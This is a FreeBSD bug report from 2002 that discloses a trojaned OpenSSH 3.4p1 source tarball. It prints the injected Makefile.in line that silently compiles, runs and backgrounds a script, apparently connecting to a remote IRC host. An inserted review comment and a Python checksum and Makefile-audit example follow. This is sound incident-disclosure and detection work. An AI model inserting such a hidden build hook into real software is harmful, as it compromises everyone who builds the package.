From edwin@mavetju.org  Thu Aug  1 00:02:38 2002
Return-Path: <edwin@mavetju.org>
Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125])
	by hub.freebsd.org (Postfix) with ESMTP
	id DE96237B401; Thu,  1 Aug 2002 00:02:36 -0700 (PDT)
Received: from topaz.mdcc.cx (topaz.mdcc.cx [212.204.230.141])
	by mx1.FreeBSD.org (Postfix) with ESMTP
	id 8032A43E75; Thu,  1 Aug 2002 00:02:36 -0700 (PDT)
	(envelope-from edwin@mavetju.org)
Received: from k7.mavetju (topaz.mdcc.cx [212.204.230.141])
	by topaz.mdcc.cx (Postfix) with ESMTP
	id 7956D2B6E5; Thu,  1 Aug 2002 09:02:33 +0200 (CEST)
Received: by k7.mavetju (Postfix, from userid 1001)
	id 01DE86A711E; Thu,  1 Aug 2002 17:02:26 +1000 (EST)
Message-Id: <20020801070226.01DE86A711E@k7.mavetju>
Date: Thu,  1 Aug 2002 17:02:26 +1000 (EST)
From: Edwin Groothuis <edwin@mavetju.org>
Reply-To: Edwin Groothuis <edwin@mavetju.org>
To: FreeBSD-gnats-submit@freebsd.org
Cc: security-officer@freebsd.org, dinoex@FreeBSD.org
Subject: openssh-3.4p1.tar.gz trojaned
X-Send-Pr-Version: 3.113
X-GNATS-Notify:

>Number:         41225
>Category:       ports
>Synopsis:       openssh-3.4p1.tar.gz trojaned
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    dinoex
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          change-request
>Submitter-Id:   current-users
>Arrival-Date:   Thu Aug 01 00:10:01 PDT 2002
>Closed-Date:    Mon Aug 05 20:28:54 PDT 2002
>Last-Modified:  Mon Aug 05 20:28:54 PDT 2002
>Originator:     Edwin Groothuis
>Release:        FreeBSD 4.5-RELEASE i386
>Organization:
-
>Environment:
System: FreeBSD k7.mavetju 4.5-RELEASE FreeBSD 4.5-RELEASE #3: Mon Mar 11 13:32:05 EST 2002 edwin@k7.mavetju.org:/usr/src/sys/compile/k7 i386

>Description:

    Do *NOT* update the md5 checksum on openssh-3.4p1.
    The file on ftp.openbsd.org is trojaned.

>How-To-Repeat:

>Fix:
>Release-Note:
>Audit-Trail:
Responsible-Changed-From-To: freebsd-ports->dinoex 
Responsible-Changed-By: ijliao 
Responsible-Changed-When: Thu Aug 1 00:39:44 PDT 2002 
Responsible-Changed-Why:  
over to maintainer 

http://www.freebsd.org/cgi/query-pr.cgi?pr=41225 

From: Edwin Groothuis <edwin@mavetju.org>
To: FreeBSD-gnats-submit@FreeBSD.org, security-officer@FreeBSD.org,
	dinoex@FreeBSD.org
Cc:  
Subject: Re: ports/41225: openssh-3.4p1.tar.gz trojaned
Date: Thu, 1 Aug 2002 17:46:15 +1000

 Date: Thu, 1 Aug 2002 16:55:51 +1000
 From: Edwin Groothuis <edwin@mavetju.org>
 To: incidents@securityfocus.com
 Subject: openssh-3.4p1.tar.gz trojaned
 
 Greetings,
 
 Just want to inform you that the OpenSSH package on ftp.openbsd.org
 (and probably all its mirrors now) is trojaned:
 
 ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
 
 The OpenBSD people have been informed about it (via email to
 deraadt@openbsd.org and via irc.openprojects.org/#openbsd)
 
 
 The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
  all: libopenbsd-compat.a
 +       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
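
Review bot: the recipe added under `all:` executes code at build time and should be rejected. It compiles bf-test.c, runs the result, and passes its output to `sh` in the background (`sh ./bf-test.out &`), none of which is needed to produce libopenbsd-compat.a. The leading `@` stops make from echoing the command, so it does not appear in build output; drop the line and treat any tarball that contains it as untrusted.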
 
 bf-test.c[1] is nothing more than a wrapper which generates a
 shell-script[2] which compiles itself and tries to connect to a
 server running on 203.62.158.32:6667 (web.snsonline.net).
        
 [1] http://www.mavetju.org/~edwin/bf-test.c
 [2] http://www.mavetju.org/~edwin/bf-output.sh
 
 This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
 ports system:
 	MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
 
 This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
 	MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
 
 Edwin
 
 
State-Changed-From-To: open->closed 
State-Changed-By: dinoex 
State-Changed-When: Mon Aug 5 20:27:53 PDT 2002 
State-Changed-Why:  
Trojaned binaries have been removed. Thanks for the additional info.

http://www.freebsd.org/cgi/query-pr.cgi?pr=41225 
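
The two checks this report rests on, comparing a distfile's MD5 with the recorded values and reading the Makefile.in recipe that runs at build time, as an added Python example that is not part of the original PR or of the ports tooling. The function names, the regex heuristics and the second rule in the sample Makefile are assumptions of this example; the two digests and the flagged recipe line are the ones quoted in the report.

```python
import hashlib
import re

# Both digests are quoted in the report above (MD5 because that is what it lists).
PORTS_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"     # value in the FreeBSD ports system
TROJANED_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"  # trojaned openssh-3.4p1.tar.gz

def md5_of(path):
    # Stream the distfile so large tarballs are not read into memory at once.
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(65536), b""):
            h.update(block)
    return h.hexdigest()

def classify(digest):
    """Compare a digest with the two values from the report."""
    digest = digest.strip().lower()
    if digest == PORTS_MD5:
        return "matches-ports"
    return "trojaned" if digest == TROJANED_MD5 else "unknown"

# Heuristics (assumptions of this example) for recipes that run code during a build.
SUSPICIOUS = [
    ("runs-built-binary", re.compile(r"(?:^|[;&|])\s*\./[\w.-]+")),
    ("feeds-file-to-shell", re.compile(r"(?<![\w.-])(?:sh|bash)\s+[\w./-]+")),
    ("backgrounded", re.compile(r"(?<!&)&\s*$")),
]

def audit_makefile(text):
    """Return (line number, tags) for recipe lines matching the heuristics."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.startswith("\t"):      # recipe lines are the tab-indented ones
            continue
        recipe = line.strip()
        silenced = recipe.startswith("@")  # '@' stops make from echoing the command
        recipe = recipe.lstrip("@-+ ")
        tags = [name for name, rx in SUSPICIOUS if rx.search(recipe)]
        if tags:
            findings.append((lineno, tags + (["echo-suppressed"] if silenced else [])))
    return findings

# Constructed sample: first recipe is the line quoted in the report, second is for contrast.
SAMPLE_MAKEFILE = (
    "all: libopenbsd-compat.a\n"
    "\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &\n"
    "libopenbsd-compat.a: $(OBJS)\n"
    "\t$(AR) rv $@ $(OBJS)\n"
)
```

A digest that comes back as "unknown" is neither cleared nor condemned by this check; it only means the file is not one of the two tarballs the report identifies.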
>Unformatted:
